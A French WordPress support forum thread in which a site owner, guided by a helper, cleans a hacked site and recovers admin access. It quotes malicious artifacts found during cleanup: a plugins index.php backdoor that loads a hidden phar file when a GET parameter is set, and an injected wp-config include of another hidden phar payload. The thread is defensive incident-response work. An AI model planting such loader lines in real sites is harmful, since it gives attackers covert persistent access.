- WordPress: 5.8
- Statut : résolu
- Ce sujet contient 23 réponses, 2 participants et a été mis à jour pour la dernière fois par ferman, le il y a 2 années et 7 mois.
-
AuteurMessages
-
13 avril 2022 à 14 h 24 min #2400282
J’ai pu contacter un administrateur, qui m’a dit que la console qui s’affichait était un « rootkit », le site ayant été piraté. Il a réussi à restaurer une sauvegarde plus ancienne et la console a disparu. Malheureusement, je n’ai toujours pas accès au rôle admin, et il ne sait pas comment m’aider au delà de ça..
13 avril 2022 à 17 h 04 min #2400312S’il y a eu piratage, vous avez déjà fait la plupart des choses prévues en ce cas (changer wp-includes et wp_admin + les fichiers hors dossiers). Il reste à vérifier quelques autres fichiers/dossiers que vous n’avez pas changés qui peuvent aussi être piratés.
wp-content / upload: contient essentiellement des images et aucun fichier php ou js.
wp-config: vérifier qu’il n’y a pas de lignes anormales en tête ou à la fin du fichier.
functions.php (mais si vous avez déjà changé de thème sans résultat ça ne devrait pas être ça. Regardez quand même).
Avez vous essayé de vous recréer encore une fois un administrateur dans la nouvelle base de données? Je suppose qu’il n’y a pas d’administrateur fantôme dans cette base de données.
13 avril 2022 à 18 h 12 min #2400315Dans le dossier principal, au milieu de tous les fichiers hors dossier, il y a un fichier « wp-kaylin.php » qui m’interpelle, je n’ai jamais vu ce nom et je n’arrive pas à l’ouvrir. C’est aussi le fichier le plus lourd de la liste, il fait 89 319 octets. Je l’avais déjà remarqué avant de réinstaller wordpress comme vous me l’aviez conseillé, je l’avais supprimé et j’ai l’impression qu’il a réapparu depuis.
Je ne vois rien d’anormal dans wp-config.
Dans wp-content, j’ai mes différents dossiers correspondant à chaque année, ainsi qu’un dossier « wp-file-manager-pro », ce qui m’étonne également puisque d’après mes recherches c’est un plugin, qui n’apparait pas dans la liste des plugins du site ni dans le bon dossier ici. La date de la dernière modification du dossier coïncide avec celle du fameux « wp-kaylin » cité plus haut. A l’intérieur de ce dossier, il y a un fichier .htaccess ainsi qu’un index.html vide.
Le .htaccess contient juste ces lignes de code :
<FilesMatch « \.(zip|gz)$ »>
Order allow,deny
Deny from all
</Files>Dans mon dossier plugins, il y a un dossier pour chaque plugin, et juste un fichier index.php hors dossier, dont la date de la dernière modification coïncide encore une fois, et dont le code est le suivant
<?php
if($_GET[« sd »] == »sd »)
{
require(‘phar:///www/missionspro/missionspro.unistra.fr/conf/php/fisd.ini/filecontral-change2.php’);}
// Silence is golden.Est-ce que certains de ces fichiers vous semblent louches ? Dans le reste du dossier wp-content, je ne vois autrement que des photos.
J’ai aussi essayé de créer un nouveau profil administrateur depuis la nouvelle base de donnée, sans succès encore une fois.
13 avril 2022 à 18 h 59 min #2400324Est-ce que certains de ces fichiers vous semblent louches ?
Très louches; ce sont certainement des fichiers correspondant à un piratage. Faites d’abord une sauvegarde de votre base de données et des dossiers du site. Ensuite supprimez tous les thèmes non actifs de votre site (mais gardez un thème par défaut par exemple twenty-twentyone ; pas twenty-twentytwo). Ensuite il faut supprimer » wp-file-manager-pro » qui n’a rien à faire dans wp-contents/upload et « wp-kaylin.php » (. Vérifiez aussi index.php et .htaccess. Re-téléchargez une version fraîche de votre thème (attention: si vous y avez fait des personnalisations importantes vous les perdrez d’où l’intérêt de la sauvegarde ). Pareil pour les extensions. Regardez aussi la base de données , nettoyez éventuellement et changez son mot de passe. Et dites-nous ce que vous voyez d’anormal.
CECI pourra aussi vous intéresser (ressemble à ce que vous voyez).
- Cette réponse a été modifiée le il y a 2 années et 7 mois par ferman.
13 avril 2022 à 20 h 06 min #2400327J’ai supprimé tous les fichiers suspects, et ai procédé à un scan avec sucuri qui m’en a donné 4 autres à supprimer également, tous créés à des dates similaires. Cela n’a cependant pas résolu le problème et il m’est toujours impossible d’avoir les droits admin..
J’ai constaté dans ma base de données qu’il y avait une table « wp_wpfm_backup », dois-je également la supprimer ?
Merci
13 avril 2022 à 20 h 50 min #2400329Oui vous pouvez supprimer cette table. Elle correspond à file manager.
Vous avez bien fait tout le reste? Revérifiez si le fichier wp-kaylin.php est revenu. Comment est le fichier .htaccess en tête de votre site? Il devrait être comme indiqué ICI , paragraphe « .htaccess à la racine du site ». Si vous n’en avez pas mis il ne devrait pas y en avoir d’autre.
14 avril 2022 à 9 h 10 min #2400362Bonjour,
J’ai bien supprimé la table. Mon fichier .htaccess n’était pas exactement comme celui dans l’article que vous avez envoyé, je l’ai donc modifié. Malheureusement, le problème reste le même..
14 avril 2022 à 12 h 04 min #2400371C’est bon, j’ai réussi à régler le problème !
Il restait une ligne étrange dans wp-config que je n’avais pas vue. Voici le code :
include(‘phar:///www/missionspro/missionspro.unistra.fr/logs/2021/.missyou.ini/missionspro.php’);
En la supprimant, j’ai à nouveau accès à mon rôle admin.
Merci encore d’avoir pris le temps de m’aider ! Très bonne journée à vous
14 avril 2022 à 12 h 55 min #2400376En la supprimant, j’ai à nouveau accès à mon rôle admin.
Avec tout ce que vous avez fait je pense que le nettoyage est complet Vous verrez si ça revient auquel cas vous connaissez la procédure. C’était quand même une infection tordue, non classique et non repérée par Sucuri; heureusement que votre administrateur l’a repérée autrement ça aurait été nettement plus long pour identifier la cause du problème. Je garde en mémoire pour un usage futur éventuel.
- Cette réponse a été modifiée le il y a 2 années et 7 mois par ferman.
-
AuteurMessages
- Vous devez être connecté pour répondre à ce sujet.